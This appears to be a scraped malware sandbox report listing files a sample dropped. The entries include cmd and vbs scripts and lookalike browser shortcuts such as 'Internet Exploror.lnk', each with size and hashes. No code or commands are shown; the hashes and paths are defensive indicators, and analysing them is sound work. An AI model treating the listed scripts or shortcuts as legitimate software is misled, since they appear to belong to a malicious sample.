ed1c4cd5c5c40ff2815ad8f3eb2dfafa3042ff790e566e45479bfb1335159d29

SHA512
79ddac71ad9f0fd062fb41ce40e69d93a05e04f3b1cb86859862bf2087d7a1e74f0866dda4579f5bdd86a6f701c8145cde69cabf86d2da23199f947f3221be30

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
72ee56a1422486b17ae4fc431c4ce9c4

SHA1
f8f8d0a6d656d0380d9cd1e78b41b4fc0ea5e2e7

SHA256
18da7d50b2e884d8b42da19e043a204cd7cec1c88023f7cc7b78001fbfa56a30

SHA512
0dfce3e4d4a3d772bf5d7decb83b8b1c2b455455e5a7bc85b77d474aa1e239f4dae7c83d7c210903347352f6e075fc6f5e174bc725ed648959ca9a12b61a9ba4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
af510e1a17c9dc4302a739b7602ea343

SHA1
6e2044677029f33f6564e7a5f7a4ab1355eea09e

SHA256
609ae098d0392b2d848354aa293419b0aef142bdf91b2977ce7a401908052637

SHA512
08c64e1fe19e094c4ad1e2d5379b74600afae1713397e4de25cf30180b6f2cda5ac2673f0248d77a03ef8c99f6a6b75b8c15d2a95585e9a7be3bc41209f24a06

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
dc6ab43c432f825332a4ab0c5a13a386

SHA1
7c893c7b943831a39064b734cd3e93d1844d831a

SHA256
abf1c739fd40729351c89447a911a7efc32afd2282c09c8500a46246f4bb13db

SHA512
d72da7745aad42b390e58c8a4992e3cf4a1a8904f47be0ce3aab179170d549ab9fe9c06320454bc0a5450af9e597fa1ad75c6820d3c2b0c744310049ed014f89

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
db2088613e3ebd66598a334b4dc8433a

SHA1
fc5576c5f8f1ddc0759b02bb1195246adbc8f15c

SHA256
fd370aa367b24361c82a177d99447139b044fee52dc9d984fcebf79a9f811871

SHA512
5250b6df3168774325fb755eb912c65d473a57b2b9d10506a393cc8a7d4855d43da066af1973d2ce0b11294e500384646fdd2cd4c403771e6d01cbb1ace1c129

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5218e6edef022721c56ccfbb1b64ee9d

SHA1
52ca61c8fb472900d0ce2ced6c9c70113ffbf6c3

SHA256
a18e170ffbe78d34dac6ad9214dcf497add4768d3f631942bb12f004ffdd1117

SHA512
65cf5443c6d13df7cc2ba5dc85486fd2a364187e368d8b86669f73fc6584ff73c3362723abe640a6626e8901708565f4ba188497c263cb5022de137950d3a71f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
22aaa94c089ee182b9b72492aa2cb613

SHA1
1767478ad65d009341eae0a355d8a2e283b0cce7

SHA256
3c88bad593b0144d4638079e41d343c486193d361ad3659626eab768e1340d99

SHA512
84bbf016d9dd41d17d9f4fc8abd09821b003f7ce47e887d6dd09a0fff3794021b8e662b2f09aa79cbaa35baf5207a8467eeea536cec3b2f4d675f6f691914e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3304.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd

Filesize
1KB

MD5
67240c407312315393794e9b65d1e8e5

SHA1
810b252670834678fdaa057b39e07985a029be7a

SHA256
0a29a7d11891968f5a4a6eb615e87a428d5e93c9a48908c7a1de7cf5a40acf22

SHA512
897bfb0b8b9ca3a315ff72b9c937aba50ddb88dd28ce3d8f156ccb01d008e566260e317364966fc3fe59a6f78017ad3924f32dd6d4b4a170550edc55b62bd3f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360SE.vbs

Filesize
194B

MD5
6b80c52f50e5365d484f500112c8fc4e

SHA1
1199341427821b402d5d2047e1c636132cfc1fb5

SHA256
934b4f7b2d356ee10e4fa8101d02bd32b9812af08e579b3407309b2102e2e381

SHA512
bba9444a31536d3364ca484ed0d167f77d4371cf25d7d0bbe33c154557f957c154a708931eda7fa4bbaac0e7c4150a4dd2021d5ebe73d500f72406eb599359fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

Filesize
567B

MD5
feb810eaa38eb0890ad2034d322e4c79

SHA1
a7c7ddd0bd405b949ddbffed364269d145ee78e4

SHA256
e346f4ed81e3e7974c4a9978789fc08737abc4c7318f31d747b1ad23ce5bf800

SHA512
f96b5e8129ab8fd4703a2e4bddf4245e9c4a64a8d69663f755386021cb8fd34a75bd0fa53b4579145bf50be2948d9ae5d0f4bdb556ae73b4cc85e6a2130f5ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36OSE.vbs

Filesize
186B

MD5
662f2165658bc093dd1034e1fa967c19

SHA1
dfedd96e1beffd2f55a6c695bef3c02d9210c1e8

SHA256
8ae7f05d4c5adffd642515452ca81ec561711d244ef075da5fe654fee6528587

SHA512
ba3834b019150dbeef6bf423688b37888da75b868621b1f5541c0f4c4df145397d38d9adc26e363a59ea75909aa38d822189b04e87dbaa6273f9a59dba141a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36O安全刘览器 3.lnk

Filesize
728B

MD5
5de7d18cf225c0ba1372cf5116e59aa1

SHA1
33676f13b1db5ccee2e86051621d885dbf3d67be

SHA256
e0165bab67739a877386522ea0ad81fe7efda9761042ce5fec17f2598c46bda0

SHA512
51003dc5995d267f32baad7339d18dd69d5c5302026e7ba9921161d42c3691d0c41497a2c865f248c19bc9c24a14844667707dabc0c722baf72ea93b72bbea91

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36O安全刘览器3.lnk

Filesize
1KB

MD5
66638d05f1edfab2f44526e99ec1c08d

SHA1
e06b8e5a4969996db01053a5c3558fcbb2065c88

SHA256
9303196dce4d4c98c6ea3568b10edacedddfe99ada0179b649383b46b6bac58b

SHA512
c3e0a649c8b23bf2ed935146b66b655187c72420e4abffd6cb6cf099ee98aefe84f92db118ab860ea2c3cbb6c78424f025d788548053d9ab3a4f273f156056fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Exploror.lnk

Filesize
104B

MD5
b6090a24bad18a0205bb215cb1fd42e6

SHA1
da56e637a186333e1fa8401b9600e9efcadbe86b

SHA256
5cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8

SHA512
4ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
1KB

MD5
505cb6fccd0e15d878b8dcbac64ad4d5

SHA1
9b49f5035dd7855646d94bd38cb500805f7829e4

SHA256
c4b7e33e97a94a80aea645e8f8601cb3db420bc5a7f828abb93054c2f69341f2

SHA512
bc5b17105fbbbaa3af7a8eb0708d379a3206eae93391939584503096a7e8eb260dacb75efe7b82d19fac4c4c2921cc9df36269977cd840c1208905ed08e7771c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cpa.cmd

Filesize
26B

MD5
70d1fda1955129df6366d9736fc6708d

SHA1
5c408345b15dfd6e9f68694f5d27ba5e1107fd98

SHA256
bcb64c2630830a92cda12c8cc449183d663eced283d351877b93956cf352ee3e

SHA512
52d0d16eb39d229667dce1fa4119419fb8e1736ff0b953e8f1cbfca594a71a30b65e63923aa591380603578ccdde6ed817ff29fe38f0f9ee9db9495991437958

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ha.vbs

Filesize
1KB

MD5
97b8dddd4361596cdeb6851a0639d834

SHA1
7f35a8018d53777c449b9703a867c0f41b542e62

SHA256
fa554b0be47bc18d0992bf700e8495ad29237d88413faac60cc1850a51dedb80

SHA512
d3103e2bd9c5e272ae7f80e27c62ca70ee06adb6b6c85b2c60f34e781ed54f140caa1cb4f0787256e4e66cd47dd4047cee0bb50a13bac581a05f47d904009f4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd

Filesize
95B

MD5
5b3aca86e0c9eaf57e4d29f4a9f11571

SHA1
2300ea98a75fdb1f8c72da8a758a1885e4441469

SHA256
4cc6b5c204f0568f51ad13a04e4b3522256c558f36c656d5038b1871aacdb308

SHA512
eba2b1725c68584d5521e945a5f004216fa4b9267f2c6d39cdfeb7b4c8ed17a287be75c5b2f8147d785c35e69835de429365a212f0ed51c904c49a9efddd18a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

Filesize
11KB

MD5
6e419580c83dc37ea0d4180edf970d8d

SHA1
925a3a9bb26c499419a9af243bc2c7cc8269057d

SHA256
b9106c1bfd52fc13d097951b44d3f6f2023f5e31e9bbbf8dbccf8aad3b6adcd7

SHA512
9021fff118365e8d384ef7ac41779ea6eca60ff30da2d8d1e36a8382594847cb6bfdd0d614cee3c2cba6c20b998020dd2289ec642b6380691b0e8548046cd3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

Filesize
3KB

MD5
d7eece295819ac643894e11ec290fc16

SHA1
eaf976563ab1d54ddbb538846f21d80663c0482b

SHA256
00057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef

SHA512
61602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

Filesize
995B

MD5
ca800c94c5577bfe494c00298f8d4bc4

SHA1
41aef2500e443dc7a1c614ad8a38dfd1035a728f

SHA256
e4004d757e7cb870d7846ff7dd328afba5a2dcc49e7fbe73c0d1c42e720d56b4

SHA512
ef38e3973685b3ad5bf4ca50858b6ca24756ea63eef955af2e9ae3d7cc86659ef37267e4bbbca938b143fff692ac65dfe64c37d9fd9ae6598650d8505dfb3bcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar33A4.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads